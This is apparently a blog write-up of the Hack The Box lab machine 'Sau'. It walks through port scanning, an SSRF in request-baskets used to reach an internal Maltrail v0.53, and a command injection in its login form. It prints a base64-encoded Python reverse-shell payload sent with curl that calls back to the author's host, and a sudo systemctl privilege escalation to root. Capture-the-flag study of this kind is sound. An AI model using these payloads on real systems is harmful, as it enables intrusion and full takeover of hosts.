Skip to main content

Hack The Box Machine - Sau

Easy Box #

Sau

Name Sau
OS Linux
RELEASE DATE July 8, 2023
DIFFICULTY Easy

Port Scan #

I actually wanted to test Naabu as my scanner of choice to be able to enumerate the host. I just Naabu to scan all of the ports and Naabu has a feature to then pump the ports to nmap. This was my command and output.

solidshadw@solidManjaro  ~/Downloads   
$ sudo naabu -p - -host 10.10.11.224 -nmap-cli 'nmap -sV -oX nmap-outpu  
t'
  
                 __  
 ___  ___  ___ _/ /  __ __  
/ _ \/ _ \/ _ \/ _ \/ // /  
/_//_/\_,_/\_,_/_.__/\_,_/  
  
               projectdiscovery.io  
  
[INF] Current naabu version 2.1.6 (latest)  
[INF] Running host discovery scan  
[INF] Running SYN scan with CAP_NET_RAW privileges  
[INF] Found 2 ports on host 10.10.11.224 (10.10.11.224)  
10.10.11.224:55555  
10.10.11.224:22  
[INF] Running nmap command: nmap -sV -oX nmap-output -p 22,55555 10.10.  
11.224  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 14:30 MDT  
Nmap scan report for 10.10.11.224  
Host is up (0.069s latency).  
  
PORT      STATE SERVICE VERSION  
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux;  
protocol 2.0)  
55555/tcp open  unknown  
1 service unrecognized despite returning data. If you know the service/  
version, please submit the following fingerprint at https://nmap.org/cg  
i-bin/submit.cgi?new-service :  
SF-Port55555-TCP:V=7.94%I=7%D=7/29%Time=64C576E7%P=x86_64-pc-linux-gnu%  
r(G  
SF:etRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/htm  
l;\  
SF:x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Sat,\x2029\x20Jul\  
x20  
SF:2023\x2020:30:31\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\  
"/w  
SF:eb\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x2  
0Re  
SF:quest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection  
:\x  
SF:20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x  
202  
SF:00\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Sat,\x2029\x20Jul\  
x20  
SF:2023\x2020:30:31\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequ  
est  
SF:,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/pla  
in;  
SF:\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reque  
st"  
SF:)%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20  
tex  
SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\  
x20  
SF:Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n  
Con  
SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r  
\n\  
SF:r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x204  
00\  
SF:x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r  
\nC  
SF:onnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,6  
7,"  
SF:HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x  
20c  
SF:harset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%  
r(K  
SF:erberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t  
ext  
SF:/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x  
20R  
SF:equest")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\  
r\n  
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Opti  
ons  
SF::\x20nosniff\r\nDate:\x20Sat,\x2029\x20Jul\x202023\x2020:30:58\x20GM  
T\r  
SF:\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20  
nam  
SF:e\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}  
\$\  
SF:n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty  
pe:  
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\  
x20  
SF:Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ  
est  
SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20  
clo  
SF:se\r\n\r\n400\x20Bad\x20Request");  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  
  
Service detection performed. Please report any incorrect results at htt  
ps://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 89.64 seconds

Looks like we found 2 ports opened. Port 22 and Port 55555.

Port 55555 #

Looks like this port is running a web interface

image

As I inspect the app. Looks like you can create a webhook like in which it collects and inspects the data sent over.

We can send requests to the basket that I created http://10.10.11.224:55555/web/gfr64fy.

image1

On the main page, I saw a version number Version: 1.2.1. Which I proceeded to look any potential vulnerabilities and bingo. https://github.com/advisories/GHSA-58g2-vgpg-335q, Looks like it is vulnerable to SSRF. As I continue to dig into this vulnerability, seems that it is exploiting the /api/baskets/{name}. That means that every time we visit that site, that api path gets called and triggered.

Exploring that app a bit more, I found that you can forward URLs.

image2

I stumbled upon this article that was explaining the SSRF vulnerability and they used this feature of forward URL to exploit the SSRF to find any other webservers not exposed to internet. They found more resources on the localhost that where to not available on our initial scan. So, I tried on port 80 and boom we got another webserver.

iamge3

image4

It looks like it is a Maltrail from the description at the bottom. It also exposes a version v0.53. A quick google search, you can find that version is vulnerable to an Unauthenticated RCE(the best kind) https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/.

We will need to add the /login at the end because it looks that is where that RCE happens. So, in the end our config will look something like this:

image5

Payload to get RevShell #

I started testing the RCE by sending a curl command to my host.

image6

Which it was successful! So, we know that it is working.

image8

I tried the basic sh revershell but I couldn’t get it to work, not sure why. When digging into this RCE I found this article in which they craft a python reverse shell and echo it in base64 and decode and execute with bash. This was my final payload:

$ curl 'http://10.10.11.224:55555/gfr64fy' \         
 --data 'username=;`echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZ  
XNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJF  
QU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjEwIiw4MDg1KSk7b3MuZHVwMihzLmZpbGVubyg  
pLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG  
9ydCBwdHk7IHB0eS5zcGF3bigiYmFzaCIpJw==|base64 -d|bash`'

After executing it, it worked!

image9

Privilege Escalation Payload #

Looks like we are running as the user “puma”. I ran the command sudo -l to see if he’s able to run any commands as sudo without a password.

image10

A quick google search on privilege escalation when running systemctl status landed me on this page https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/.

So, the final payload is divided in two parts. The first is:

sudo systemctl status trail.service

And then you run:

!sh

And that drops you into a shell. We have made it to root.

image11